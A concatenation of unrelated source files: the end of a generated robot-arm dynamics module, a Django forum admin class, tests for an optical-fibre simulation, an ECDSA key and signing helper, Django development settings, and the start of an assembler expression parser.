M_out[8] = parms[17] + 0.03175*parms[30]*x105 + 0.03175*parms[31]*x2 + 0.0010080625*parms[33] + x102*(parms[32]*x7 + parms[33]*x102 - x154) + x103*(parms[32]*x89 + parms[33]*x103 + x135*x64 + x152*x9) + 0.03175*x136 + 0.03175*x153 + x2*(parms[24]*x2 + parms[25]*x89 + 0.03175*parms[31] + parms[32]*x115 + x156*x9 + x159*x64) + x89*(parms[25]*x2 + parms[27]*x89 - 0.03175*parms[30] + parms[32]*x103 + 0.00502*x136 - x151 + 0.00502*x153)
M_out[9] = x160
M_out[10] = x151
M_out[11] = x158
M_out[12] = x149
M_out[13] = x141
M_out[14] = x101
M_out[15] = x160
M_out[16] = parms[29] + 0.00502*parms[42]*x161 + 0.00502*parms[43]*x13 + 2.52004e-5*parms[45] + x13*(parms[36]*x13 + parms[37]*x9 + 0.00502*parms[43] + x155*x182 + x181*x75 + x189*x20 + x191*x40) + 0.00502*x181*x40 + 0.00502*x182*x90 + x9*(parms[37]*x13 + parms[39]*x9 - 0.00502*parms[42] + x188)
M_out[17] = x192
M_out[18] = x188
M_out[19] = x190
M_out[20] = x183
M_out[21] = x93
M_out[22] = x151
M_out[23] = x192
M_out[24] = parms[41] + x155*(parms[56]*x90 + parms[57]*x155 + x59*(-parms[67]*x198 + parms[68]*x195 + parms[69]*x200 + x208*x76 + x209*x57) + x82*(parms[66]*x198 - parms[68]*x197 + parms[69]*x193 + parms[78]*x203 - parms[79]*x199 - parms[81]*x194)) + x40*(parms[48]*x40 + parms[49]*x90 + parms[56]*x201 + x210*x59 + x212*x82) + x90*(parms[49]*x40 + parms[51]*x90 + parms[56]*x155 - x207) + x91*(-parms[56]*x40 + parms[57]*x91 - parms[66]*x196 - parms[67]*x197 - parms[69]*x201 - x208*x57 - x209*x38)
M_out[25] = x213
M_out[26] = x207
M_out[27] = x211
M_out[28] = x85
M_out[29] = x158
M_out[30] = x188
M_out[31] = x213
M_out[32] = parms[53] + x30*(parms[60]*x30 + parms[61]*x59 + x217*x57 + x218*x76) + x59*(parms[61]*x30 + parms[63]*x59 - x219)
M_out[33] = x220
M_out[34] = x219
M_out[35] = x72
M_out[36] = x149
M_out[37] = x190
M_out[38] = x207
M_out[39] = x220
M_out[40] = parms[65] + x38*(parms[72]*x38 + parms[73]*x57) + x57*(parms[73]*x38 + parms[75]*x57)
M_out[41] = x221
M_out[42] = x80
M_out[43] = x141
M_out[44] = x183
M_out[45] = x211
M_out[46] = x219
M_out[47] = x221
M_out[48] = parms[77]
#
return M_out
def c( parms, q, dq ) :
#
c_out = [0]*7
#
x0 = sin(q[2])
x1 = cos(q[1])
x2 = dq[0]*x1
x3 = -sin(q[1])
x4 = dq[0]*x3
x5 = x2*x4
x6 = ((dq[1])*(dq[1]))
x7 = -0.03175*((x4)*(x4)) + 0.27857*x5 - 0.03175*x6
x8 = dq[1]*x4
x9 = dq[1]*x2
x10 = -x9
x11 = -x10
x12 = 0.03175*x11 + 0.55714*x8 + 0.03175*x9
x13 = cos(q[2])
x14 = -x13
x15 = x0*x7 + x12*x14
x16 = x0*x12 + x13*x7
x17 = dq[1]*x0 + x13*x2
x18 = -x17
x19 = -x4
x20 = dq[2] + x19
x21 = -x2
x22 = dq[1]*x13 + x0*x21
x23 = parms[24]*x22 + parms[25]*x18 + parms[26]*x20
x24 = -x18
x25 = -dq[2]*x17 - x0*x8
x26 = -dq[2]*x22 - x13*x8
x27 = parms[25]*x22 + parms[27]*x18 + parms[28]*x20
x28 = cos(q[5])
x29 = cos(q[6])
x30 = cos(q[4])
x31 = dq[3] + x24
x32 = sin(q[4])
x33 = cos(q[3])
x34 = sin(q[3])
x35 = x20*x34 + x22*x33
x36 = -x30*x31 - x32*x35
x37 = x20*x33
x38 = x22*x34
x39 = -dq[3]
x40 = x11*x34 + x25*x33 + x39*(-x37 + x38)
x41 = -x26
x42 = -x41
x43 = dq[4]*x36 + x30*x40 + x32*x42
x44 = -x43
x45 = -x25
x46 = x11*x33 + x34*x45 + x35*x39
x47 = -x46
x48 = sin(q[5])
x49 = -x32
x50 = x30*x35 + x31*x49
x51 = x48*x50
x52 = x37 - x38
x53 = dq[4] + x52
x54 = x28*x53
x55 = dq[5]*(x51 - x54) + x28*x44 + x47*x48
x56 = -x55
x57 = x35*x52
x58 = x42 + x57
x59 = ((x20)*(x20))
x60 = ((x18)*(x18))
x61 = -x59 - x60
x62 = x15 - 0.00502*x61
x63 = x20*x22
x64 = x41 + x63
x65 = -0.27857*((x2)*(x2)) + 0.03175*x5 - 0.27857*x6
x66 = -0.00502*x64 + x65
x67 = x33*x62 + x34*x66
x68 = 0.27747*x58 + x67
x69 = x31*x52
x70 = x40 + x69
x71 = x18*x22
x72 = x11 + x71
x73 = -x16
x74 = 0.00502*x72 + x73
x75 = 0.27747*x70 + x74
x76 = x30*x68 + x49*x75
x77 = ((x35)*(x35))
x78 = ((x31)*(x31))
x79 = -x77 - x78
x80 = -x34
x81 = x33*x66 + x62*x80
x82 = 0.27747*x79 + x81
x83 = -x28*x76 - x48*x82
x84 = -x83
x85 = -x28*x50 - x48*x53
x86 = -x85
x87 = dq[6] + x86
x88 = -x51 + x54
x89 = -x36
x90 = dq[5] + x89
x91 = sin(q[6])
x92 = -x29*x88 - x90*x91
x93 = x29*x90
x94 = x88*x91
x95 = x93 - x94
x96 = parms[72]*x95 + parms[73]*x92 + parms[74]*x87
x97 = -dq[4]*x50 - x30*x41 - x32*x40
x98 = -x97
x99 = -x98
x100 = dq[5]*x85 + x28*x46 + x44*x48
x101 = -x100
x102 = dq[6]*(-x93 + x94) + x101*x29 + x91*x99
x103 = dq[6]*x92 + x101*x91 + x29*x98
x104 = -x30*x75 - x32*x68
x105 = -x104
x106 = -x76
x107 = x106*x48 + x28*x82
x108 = -x107
x109 = x105*x29 + x108*x91
x110 = parms[74]*x95 + parms[76]*x92 + parms[77]*x87
x111 = parms[73]*x103 + parms[75]*x102 + parms[76]*x56 - parms[78]*x84 + parms[80]*x109 - x110*x95 + x87*x96
x112 = parms[61]*x88 + parms[63]*x85 + parms[64]*x90
x113 = parms[62]*x88 + parms[64]*x85 + parms[65]*x90
x114 = parms[73]*x95 + parms[75]*x92 + parms[76]*x87
x115 = -x105*x91 - x107*x29
x116 = parms[72]*x103 + parms[73]*x102 + parms[74]*x56 + parms[79]*x84 - parms[80]*x115 + x110*x92 - x114*x87
x117 = -x91
x118 = parms[60]*x100 + parms[61]*x55 + parms[62]*x98 + parms[67]*x105 + parms[68]*x84 - x111*x29 - x112*x90 + x113*x85 + x116*x117
x119 = parms[74]*x103 + parms[76]*x102 + parms[77]*x56 + parms[78]*x115 - parms[79]*x109 + x114*x95 - x92*x96
x120 = parms[60]*x88 + parms[61]*x85 + parms[62]*x90
x121 = parms[61]*x100 + parms[63]*x55 + parms[64]*x98 - parms[66]*x105 + parms[68]*x107 - x113*x88 - x119 + x120*x90
x122 = -x48
x123 = parms[49]*x50 + parms[51]*x36 + parms[52]*x53
x124 = parms[48]*x50 + parms[49]*x36 + parms[50]*x53
x125 = parms[50]*x43 + parms[52]*x97 + parms[53]*x46 + parms[54]*x104 + parms[55]*x106 + x118*x28 + x121*x122 + x123*x50 + x124*x89
x126 = parms[36]*x35 + parms[37]*x52 + parms[38]*x31
x127 = parms[38]*x35 + parms[40]*x52 + parms[41]*x31
x128 = parms[37]*x40 + parms[39]*x46 + parms[40]*x41 - parms[42]*x74 + parms[44]*x67 + x125 + x126*x31 - x127*x35
x129 = parms[37]*x35 + parms[39]*x52 + parms[40]*x31
x130 = x87*x95
x131 = x92*x95
x132 = ((x87)*(x87))
x133 = ((x92)*(x92))
x134 = parms[78]*(-x132 - x133) + parms[79]*(x131 - x56) + parms[80]*(x102 + x130) + parms[81]*x109
x135 = ((x95)*(x95))
x136 = x87*x92
x137 = -parms[78]*(x131 + x56) - parms[79]*(-x132 - x135) - parms[80]*(-x103 + x136) - parms[81]*x115
x138 = x88*x90
x139 = ((x85)*(x85))
x140 = ((x88)*(x88))
x141 = x85*x90
x142 = x36*x53
x143 = x36*x50
x144 = ((x50)*(x50))
x145 = ((x53)*(x53))
x146 = parms[54]*(x143 + x46) + parms[55]*(-x144 - x145) + parms[56]*(x142 + x44) + parms[57]*x104 - parms[66]*(x138 + x56) - parms[67]*(x100 + x141) - parms[68]*(-x139 - x140) - parms[69]*x105 - x134*x29 - x137*x91
x147 = x146*x30
x148 = parms[62]*x100 + parms[64]*x55 + parms[65]*x98 + parms[66]*x83 + parms[67]*x108 + x111*x117 + x112*x88 + x116*x29 + x120*x86
x149 = parms[50]*x50 + parms[52]*x36 + parms[53]*x53
x150 = parms[49]*x43 + parms[51]*x97 + parms[52]*x46 - parms[54]*x82 + parms[56]*x76 + x124*x53 - x148 - x149*x50
x151 = ((x90)*(x90))
x152 = x85*x88
x153 = parms[66]*(-x139 - x151) + parms[67]*(x152 + x99) + parms[68]*(x138 + x55) + parms[69]*x107 + x117*x134 + x137*x29
x154 = ((x36)*(x36))
x155 = x50*x53
x156 = parms[66]*(x152 + x98) + parms[67]*(-x140 - x151) + parms[68]*(x101 + x141) + parms[69]*x83 - parms[78]*(-x102 + x130) - parms[79]*(x103 + x136) - parms[80]*(-x133 - x135) - parms[81]*x84
x157 = -x28
x158 = parms[54]*(-x145 - x154) + parms[55]*(x143 + x47) + parms[56]*(x155 + x97) + parms[57]*x76 + x122*x153 + x156*x157
x159 = parms[48]*x43 + parms[49]*x97 + parms[50]*x46 + parms[55]*x82 + parms[56]*x105 + x118*x122 + x121*x157 - x123*x53 + x149*x36
x160 = parms[36]*x40 + parms[37]*x46 + parms[38]*x41 + parms[43]*x74 - parms[44]*x81 + x127*x52 - x129*x31 - 0.27747*x147 + x150*x49 - 0.27747*x158*x32 + x159*x30
x161 = ((x52)*(x52))
x162 = x31*x35
x163 = parms[42]*(x162 + x47) + parms[43]*x70 + parms[44]*(-x161 - x77) + parms[45]*x74 - x147 + x158*x49
x164 = parms[26]*x25 + parms[28]*x26 + parms[29]*x11 + parms[30]*x16 - parms[31]*x15 + x128*x33 + x160*x34 + 0.00502*x163 + x22*x27 + x23*x24
x165 = dq[1]*parms[14] + parms[12]*x2 + parms[13]*x4
x166 = dq[1]*parms[17] + parms[14]*x2 + parms[16]*x4
x167 = x18*x20
x168 = ((x22)*(x22))
x169 = parms[30]*x72 + parms[31]*(-x168 - x59) + parms[32]*(x167 + x45) + parms[33]*x16 - x163
x170 = x0*x169
x171 = parms[42]*(x41 + x57) + parms[43]*x79 + parms[44]*(-x40 + x69) + parms[45]*x81 + parms[54]*(x155 + x98) + parms[55]*(x142 + x43) + parms[56]*(-x144 - x154) + parms[57]*x82 + x122*x156 + x153*x28
x172 = x158*x30
x173 = parms[42]*(-x161 - x78) + parms[43]*x58 + parms[44]*(x162 + x46) + parms[45]*x67 + x146*x49 + x172
x174 = parms[30]*x61 + parms[31]*(-x11 + x71) + parms[32]*(x26 + x63) + parms[33]*x15 + x171*x80 + x173*x33
x175 = x13*x174
x176 = parms[26]*x22 + parms[28]*x18 + parms[29]*x20
x177 = parms[24]*x25 + parms[25]*x26 + parms[26]*x11 + parms[31]*x65 + parms[32]*x73 + x128*x80 + x160*x33 + x176*x18 - x20*x27
x178 = -x0
x179 = x173*x34
x180 = x171*x33
x181 = parms[38]*x40 + parms[40]*x46 + parms[41]*x41 + parms[42]*x81 - parms[43]*x67 - x126*x52 + x129*x35 + 0.27747*x146*x32 - x150*x30 + x159*x49 - 0.27747*x172
x182 = parms[25]*x25 + parms[27]*x26 + parms[28]*x11 - parms[30]*x65 + parms[32]*x15 - x176*x22 + 0.00502*x179 + 0.00502*x180 - x181 + x20*x23
x183 = dq[1]*parms[16] + parms[13]*x2 + parms[15]*x4
#
c_out[0] = x1*(-dq[1]*x183 + parms[12]*x8 + parms[13]*x10 + x14*x182 + x166*x4 + 0.27857*x170 - 0.27857*x175 + x177*x178) + x3*(dq[1]*x165 + parms[13]*x8 + parms[15]*x10 - x164 + x166*x21 - 0.03175*x170 + 0.03175*x175)
c_out[1] = parms[14]*x8 + parms[16]*x10 + 0.03175*parms[30]*x64 + 0.03175*parms[31]*(x167 + x25) + 0.03175*parms[32]*(-x168 - x60) + 0.03175*parms[33]*x65 - 0.27857*x0*x174 - 0.27857*x13*x169 + x13*x177 + x165*x19 + x178*x182 + 0.03175*x179 + 0.03175*x180 + x183*x2
c_out[2] = x164
c_out[3] = x181
c_out[4] = x125
c_out[5] = x148
c_out[6] = x119
#
return c_out
def f( parms, q, dq ) :
#
f_out = [0]*7
#
f_out[0] = dq[0]*parms[10] + parms[11]*sign(dq[0])
f_out[1] = dq[1]*parms[22] + parms[23]*sign(dq[1])
f_out[2] = dq[2]*parms[34] + parms[35]*sign(dq[2])
f_out[3] = dq[3]*parms[46] + parms[47]*sign(dq[3])
f_out[4] = dq[4]*parms[58] + parms[59]*sign(dq[4])
f_out[5] = dq[5]*parms[70] + parms[71]*sign(dq[5])
f_out[6] = dq[6]*parms[82] + parms[83]*sign(dq[6])
#
return f_out
def g( parms, q ) :
#
g_out = [0]*7
#
x0 = 9.81*cos(q[0])
x1 = 9.81*sin(q[0])
x2 = sin(q[2])
x3 = cos(q[2])
x4 = sin(q[1])
x5 = x0*x4
x6 = -x1
x7 = -x2*x6 - x3*x5
x8 = -x7
x9 = cos(q[4])
x10 = -x5
x11 = x10*x2 + x3*x6
x12 = cos(q[3])
x13 = cos(q[1])
x14 = x0*x13
x15 = -x14
x16 = sin(q[3])
x17 = x11*x12 + x15*x16
x18 = sin(q[4])
x19 = -x17*x18 - x8*x9
x20 = sin(q[6])
x21 = -x11
x22 = x12*x15 + x16*x21
x23 = cos(q[5])
x24 = -x8
x25 = x17*x9 + x18*x24
x26 = -x25
x27 = sin(q[5])
x28 = x22*x23 + x26*x27
x29 = cos(q[6])
x30 = -x19
x31 = -x20*x30 - x28*x29
x32 = -parms[81]*x31
x33 = -x28
x34 = x20*x33 + x29*x30
x35 = parms[81]*x34
x36 = parms[57]*x19 - parms[69]*x30 - x20*x32 - x29*x35
x37 = x36*x9
x38 = -x22*x27 - x23*x25
x39 = -x38
x40 = -parms[69]*x38 + parms[81]*x39
x41 = -x27
x42 = -x20
x43 = parms[69]*x28 + x29*x32 + x35*x42
x44 = parms[57]*x25 + x23*x40 + x41*x43
x45 = -x18
x46 = parms[45]*x8 - x37 + x44*x45
x47 = parms[33]*x7 - x46
x48 = x2*x47
x49 = parms[79]*x39 - parms[80]*x31
x50 = -parms[78]*x39 + parms[80]*x34
x51 = parms[67]*x30 + parms[68]*x39 - x29*x50 + x42*x49
x52 = parms[78]*x31 - parms[79]*x34
x53 = -parms[66]*x30 + parms[68]*x28 - x52
x54 = parms[55]*x22 + parms[56]*x30 - x23*x53 + x41*x51
x55 = -x22
x56 = parms[66]*x38 + parms[67]*x33 + x29*x49 + x42*x50
x57 = parms[54]*x55 + parms[56]*x25 - x56
x58 = parms[43]*x8 + parms[44]*x55 - 0.27747*x18*x44 - 0.27747*x37 + x45*x57 + x54*x9
x59 = parms[54]*x19 + parms[55]*x26 + x23*x51 + x41*x53
x60 = parms[42]*x24 + parms[44]*x17 + x59
x61 = parms[30]*x7 + parms[31]*x21 + x12*x60 + x16*x58 + 0.00502*x46
x62 = x44*x9
x63 = parms[45]*x17 + x36*x45 + x62
x64 = parms[45]*x22 + parms[57]*x22 + x23*x43 + x27*x40
x65 = -x16
x66 = parms[33]*x11 + x12*x63 + x64*x65
x67 = x3*x66
x68 = parms[31]*x15 + parms[32]*x8 + x12*x58 + x60*x65
x69 = -x2
x70 = parms[42]*x22 - parms[43]*x17 + 0.27747*x18*x36 + x45*x54 - x57*x9 - 0.27747*x62
x71 = x16*x63
x72 = x12*x64
x73 = -parms[30]*x15 + parms[32]*x11 - x70 + 0.00502*x71 + 0.00502*x72
#
g_out[0] = parms[6]*x1 + parms[7]*x0 + x13*(parms[19]*x6 + parms[20]*x15 - x3*x73 + 0.27857*x48 - 0.27857*x67 + x68*x69) - x4*(-parms[18]*x6 + parms[20]*x5 - 0.03175*x48 - x61 + 0.03175*x67)
g_out[1] = parms[18]*x14 + parms[19]*x10 + 0.03175*parms[33]*x15 - 0.27857*x2*x66 - 0.27857*x3*x47 + x3*x68 + x69*x73 + 0.03175*x71 + 0.03175*x72
g_out[2] = x61
g_out[3] = x70
g_out[4] = x59
g_out[5] = x56
g_out[6] = x52
#
return g_out
from darci_left_coriolis import *
#dynparms = [L_1xx, L_1xy, L_1xz, L_1yy, L_1yz, L_1zz, l_1x, l_1y, l_1z, m_1, fv_1, fc_1, L_2xx, L_2xy, L_2xz, L_2yy, L_2yz, L_2zz, l_2x, l_2y, l_2z, m_2, fv_2, fc_2, L_3xx, L_3xy, L_3xz, L_3yy, L_3yz, L_3zz, l_3x, l_3y, l_3z, m_3, fv_3, fc_3, L_4xx, L_4xy, L_4xz, L_4yy, L_4yz, L_4zz, l_4x, l_4y, l_4z, m_4, fv_4, fc_4, L_5xx, L_5xy, L_5xz, L_5yy, L_5yz, L_5zz, l_5x, l_5y, l_5z, m_5, fv_5, fc_5, L_6xx, L_6xy, L_6xz, L_6yy, L_6yz, L_6zz, l_6x, l_6y, l_6z, m_6, fv_6, fc_6, L_7xx, L_7xy, L_7xz, L_7yy, L_7yz, L_7zz, l_7x, l_7y, l_7z, m_7, fv_7, fc_7]
| 1.507813 | 2 |
machina/apps/forum_member/admin.py | BrendaH/django-machina | 572 | 12762490 | """
Forum member model admin definitions
====================================
This module defines admin classes used to populate the Django administration dashboard.
"""
from django.contrib import admin
from machina.core.db.models import get_model
from machina.models.fields import MarkupTextField, MarkupTextFieldWidget
ForumProfile = get_model('forum_member', 'ForumProfile')
class ForumProfileAdmin(admin.ModelAdmin):
""" The Forum Profile model admin. """
list_display = ('id', 'user', 'posts_count', )
list_filter = ('posts_count', )
list_display_links = ('id', 'user', )
raw_id_fields = ('user', )
search_fields = ('user__username',)
formfield_overrides = {
MarkupTextField: {'widget': MarkupTextFieldWidget},
}
admin.site.register(ForumProfile, ForumProfileAdmin)
| 2.328125 | 2 |
testing/test_pulse_prep.py | ibegleris/w-fopo | 0 | 12762491 | <gh_stars>0
import sys
sys.path.append('src')
from functions import *
import numpy as np
from numpy.testing import assert_allclose, assert_raises,assert_almost_equal
class Test_loss:
def test_loss1(a):
fv = np.linspace(200, 600, 1024)
alphadB = np.array([1, 1])
int_fwm = sim_parameters(2.5e-20, 2, alphadB)
int_fwm.general_options(1e-13, 1, 1, 1)
int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
sim_wind = sim_window(fv, 1,1, int_fwm, 1)
loss = Loss(int_fwm, sim_wind, amax=alphadB)
alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
ex = np.zeros_like(alpha_func)
for i, a in enumerate(alpha_func):
ex[i, :] = np.ones_like(a)*alphadB[i]/4.343
assert_allclose(alpha_func, ex)
def test_loss2(a):
fv = np.linspace(200, 600, 1024)
alphadB = np.array([1, 2])
int_fwm = sim_parameters(2.5e-20, 2, alphadB)
int_fwm.general_options(1e-13, 1, 1, 1)
int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
sim_wind = sim_window(fv, 1,1, int_fwm, 1)
loss = Loss(int_fwm, sim_wind, amax=2*alphadB)
alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
maxim = np.max(alpha_func)
assert maxim == 2*np.max(alphadB)/4.343
def test_loss3(a):
fv = np.linspace(200, 600, 1024)
alphadB = np.array([1, 2])
int_fwm = sim_parameters(2.5e-20, 2, alphadB)
int_fwm.general_options(1e-13, 1, 1, 1)
int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
sim_wind = sim_window(fv, 1,1,int_fwm, 1)
loss = Loss(int_fwm, sim_wind, amax=2*alphadB)
alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
minim = np.min(alpha_func)
assert minim == np.min(alphadB)/4.343
def test_fv_creator():
"""
Checks whether the first order cascade is in the freequency window.
"""
class int_fwm1(object):
def __init__(self):
self.N = 14
self.nt = 2**self.N
int_fwm = int_fwm1()
lam_p1 = 1000
lam_s = 1200
#fv, where = fv_creator(lam_p1, lam_s, int_fwm)
fv, where = fv_creator(lam_p1,lam_s,0, 50, int_fwm)
mins = np.min(1e-3*c/fv)
f1 = 1e-3*c/lam_p1
fs = 1e-3*c/lam_s
assert(all(i < max(fv) and i > min(fv)
for i in (f1, fs)))
def test_noise():
class sim_windows(object):
def __init__(self):
self.w = 10
self.T = 0.1
self.w0 = 9
class int_fwms(object):
def __init__(self):
self.nt = 1024
self.nm = 1
int_fwm = int_fwms()
sim_wind = sim_windows()
noise = Noise(int_fwm, sim_wind)
n1 = noise.noise_func(int_fwm)
n2 = noise.noise_func(int_fwm)
print(n1, n2)
assert_raises(AssertionError, assert_almost_equal, n1, n2)
def test_time_frequency():
nt = 3
dt = np.abs(np.random.rand())*10
u1 = 10*(np.random.randn(2**nt) + 1j * np.random.randn(2**nt))
U = fftshift(dt*fft(u1))
u2 = ifft(ifftshift(U)/dt)
assert_allclose(u1, u2)
"----------------Raman response--------------"
#os.system('rm -r testing_data/step_index/*')
class Raman():
l_vec = np.linspace(1600e-9, 1500e-9, 64)
fv = 1e-12*c/l_vec
dnerr = [0]
index = 0
master_index = 0
a_vec = [2.2e-6]
M1, M2, betas, Q_large = \
fibre_parameter_loader(fv, a_vec, dnerr, index, master_index,
'step_index_2m', filepath='testing/testing_data/step_index/')
def test_raman_off(self):
ram = raman_object('off')
ram.raman_load(np.random.rand(10), np.random.rand(1)[0], None,2)
assert ram.hf == None
def test_raman_load_1(self):
ram = raman_object('on', 'load')
#M1, M2, Q = Q_matrixes(1, 2.5e-20, 1.55e-6, 0.01)
D = loadmat('testing/testing_data/Raman_measured.mat')
t = D['t']
t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
dt = D['dt'][0][0]
hf_exact = D['hf']
hf_exact = np.asanyarray([hf_exact[i][0]
for i in range(hf_exact.shape[0])])
hf = ram.raman_load(t, dt, self.M2,2)
#hf_exact = np.reshape(hf_exact, hf.shape)
hf_exact = np.tile(hf_exact, (len(self.M2[1, :]), 1))
assert_allclose(hf, hf_exact)
def test_raman_analytic_1(self):
ram = raman_object('on', 'analytic')
D = loadmat('testing/testing_data/Raman_analytic.mat')
#M1, M2, Q = Q_matrixes(1, 2.5e-20, 1.55e-6, 0.01)
t = D['t']
t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
dt = D['dt'][0][0]
hf_exact = D['hf']
hf_exact = np.asanyarray([hf_exact[i][0]
for i in range(hf_exact.shape[0])])
hf = ram.raman_load(t, dt, self.M2,2)
assert_allclose(hf, hf_exact)
def test_raman_load_2(self):
ram = raman_object('on', 'load')
#M1, M2, Q = Q_matrixes(2, 2.5e-20, 1.55e-6, 0.01)
D = loadmat('testing/testing_data/Raman_measured.mat')
t = D['t']
t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
dt = D['dt'][0][0]
hf_exact = D['hf']
hf_exact = np.asanyarray([hf_exact[i][0]
for i in range(hf_exact.shape[0])])
hf = ram.raman_load(t, dt, self.M2,2)
hf_exact = np.tile(hf_exact, (len(self.M2[1, :]), 1))
assert_allclose(hf, hf_exact)
def test_raman_analytic_2(self):
ram = raman_object('on', 'analytic')
D = loadmat('testing/testing_data/Raman_analytic.mat')
#M1, M2, Q = Q_matrixes(2, 2.5e-20, 1.55e-6, 0.01)
t = D['t']
t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
dt = D['dt'][0][0]
hf_exact = D['hf']
hf_exact = np.asanyarray([hf_exact[i][0]
for i in range(hf_exact.shape[0])])
hf = ram.raman_load(t, dt, self.M2,2)
assert_allclose(hf, hf_exact)
"----------------------------Dispersion operator--------------"
class Test_dispersion_raman(Raman):
l_vec = np.linspace(1600e-9, 1500e-9, 64)
int_fwm = sim_parameters(2.5e-20, 2, 0)
int_fwm.general_options(1e-13, 0, 1, 1)
int_fwm.propagation_parameters(6, [0,18], 2, 1, 1)
sim_wind = \
sim_window(1e-12*c/l_vec, (l_vec[0]+l_vec[-1])*0.5,
(l_vec[0]+l_vec[-1])*0.5, int_fwm, 10)
loss = Loss(int_fwm, sim_wind, amax=10)
alpha_func = loss.atten_func_full(sim_wind.fv, int_fwm)
int_fwm.alphadB = alpha_func
int_fwm.alpha = int_fwm.alphadB
betas_disp = dispersion_operator(Raman.betas, int_fwm, sim_wind)
def test_dispersion(self):
"""
Compares the dispersion to a predetermined value.
Not a very good test, make sure that the other one in this class
passes.
"""
with h5py.File('testing/testing_data/betas_test1.hdf5', 'r') as f:
betas_exact = f.get('betas').value
assert_allclose(self.betas_disp, betas_exact)
def test_dispersion_same(self):
"""
Tests if the dispersion of the first two modes (degenerate) are the same.
"""
assert_allclose(self.betas_disp[:, 0, :], self.betas_disp[:, 1, :])
| 2.1875 | 2 |
identity.py | inorton/NULLTeamPlugin | 0 | 12762492 | import binascii
import hashlib
import os
import sys
from ecdsa import SigningKey, VerifyingKey, curves
from ecdsa import ecdsa
from ecdsa import util as ecdsautil
DEFAULT_KEYTYPE = curves.NIST192p
def get_keys_folder(datafolder):
"""
:param datafolder:
:return:
"""
return os.path.join(datafolder, "keys")
def get_pub_keyfilename(datafolder):
"""
:param datafolder:
:return:
"""
keyfolder = get_keys_folder(datafolder)
return os.path.join(keyfolder, "identity.pub")
def get_priv_keyfilename(datafolder):
"""
:param datafolder:
:return:
"""
keyfolder = get_keys_folder(datafolder)
return os.path.join(keyfolder, "identity.priv")
def first_run(datafolder):
"""
Do our first run and generate keys
:param datafolder:
:return:
"""
keyfolder = get_keys_folder(datafolder)
if not os.path.exists(keyfolder):
os.makedirs(keyfolder)
if not os.path.isfile(get_priv_keyfilename(datafolder)):
key = genkey()
savekey(key, keyfolder, "identity")
sys.stderr.write("ident key generated\n")
def pubkeyhash(pubkey):
"""
Get a hash of a public key
:param pubkey:
:return:
"""
return hashlib.sha512(pubkey.to_der()).hexdigest()
def genkey():
"""
Generate an ECDSA key
:return:
"""
return SigningKey.generate(curve=DEFAULT_KEYTYPE)
def savekey(keypair, path, name):
"""
Save a keypair as PEM files
:param keypair:
:param path:
:param name:
:return:
"""
privname = os.path.join(path, name + ".priv")
pubname = os.path.join(path, name + ".pub")
with open(privname, "wb") as privfile:
privfile.write(keypair.to_pem())
with open(pubname, "wb") as pubfile:
pubfile.write(keypair.get_verifying_key().to_pem())
def load(privkeypem):
"""
Load a private key from disk
:param privkeypem:
:return:
"""
with open(privkeypem, "rb") as privfile:
return SigningKey.from_pem(privfile.read())
def loadpub(pubkeypem):
"""
Load a public key from a PEM file
:param pubkeypem:
:return:
"""
with open(pubkeypem, "rb") as pubfile:
return loadpubstr(pubfile.read())
def loadpubstr(pemstring):
"""
Load a public key from PEM string
:param pemstring:
:return:
"""
return VerifyingKey.from_pem(pemstring)
def get_pubkey(datafolder):
"""
Return the public key pem file
:param datafolder:
:return:
"""
filename = get_pub_keyfilename(datafolder)
if os.path.exists(filename):
with open(filename, "r") as filehandle:
return filehandle.read()
return None
def sign_string(privkey, message):
"""
Sign a string
:param privkey:
:param message:
:return:
"""
data = str(message)
sig = privkey.sign(data, hashfunc=hashlib.sha1, sigencode=ecdsautil.sigencode_der)
return binascii.hexlify(sig)
def verify_string(pubkey, signature, message):
"""
Verify
:param pubkey:
:param signature:
:param message:
:return:
"""
data = str(message)
signature = binascii.unhexlify(signature)
return pubkey.verify(signature, data, hashfunc=hashlib.sha1, sigdecode=ecdsautil.sigdecode_der)
def ecdh(privkey, pubkey):
"""
Given a loaded private key and a loaded public key, perform an ECDH exchange
:param privkey:
:param pubkey:
:return:
"""
return ecdsa.ecdh(privkey, pubkey)
| 2.546875 | 3 |
project/project/settings/development.py | cojennin/facet | 25 | 12762493 | <filename>project/project/settings/development.py
"""Development settings for facet project."""
from django.conf import settings
from django.test.runner import DiscoverRunner
from django.core.mail.utils import DNS_NAME
from .base import *
##############################################################################
# Core Django stuff
SECRET_KEY = "abcdef"
DEBUG = True
INSTALLED_APPS += [
'debug_toolbar',
]
INTERNAL_IPS = ["127.0.0.1"]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
#######################################
# Email
#
# We don't want to send real email, so just print to the console
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Fix for broken DNS at some wifi hot-spots
DNS_NAME._fqdn = "localhost"
######################################
# Caching --- don't actual cache
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
######################################
# Logging & Error Reporting
# Blather on about every little thing that happens. We programmers get lonely.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'': {
'handlers': ['console'],
'level': 'DEBUG',
},
'factory': { # FactoryBoy is too chatty!
'handlers': ['console'],
'level': 'INFO',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
}
},
}
######################################
# Testing
#
# We don't want to spray all sorts of factory-made fake media stuff in the media folder
# (it won't hurt things, but will take up space), so let's use the temp directory for that.
class MediaTempTestSuiteRunner(DiscoverRunner):
def __init__(self, *args, **kwargs):
settings.MEDIA_ROOT = "/tmp"
super(MediaTempTestSuiteRunner, self).__init__(*args, **kwargs)
TEST_RUNNER = 'project.settings.development.MediaTempTestSuiteRunner'
| 1.828125 | 2 |
flexasm/Expression.py | camerondm9/flexasm | 0 | 12762494 | import ast
import re
import parsy
R_REFERENCE = re.compile(r'(?:(?:[^\d\W]\w*)?\.)?[^\d\W]\w*\s*', re.IGNORECASE)
R_SPACE = re.compile(r'\s+', re.IGNORECASE)
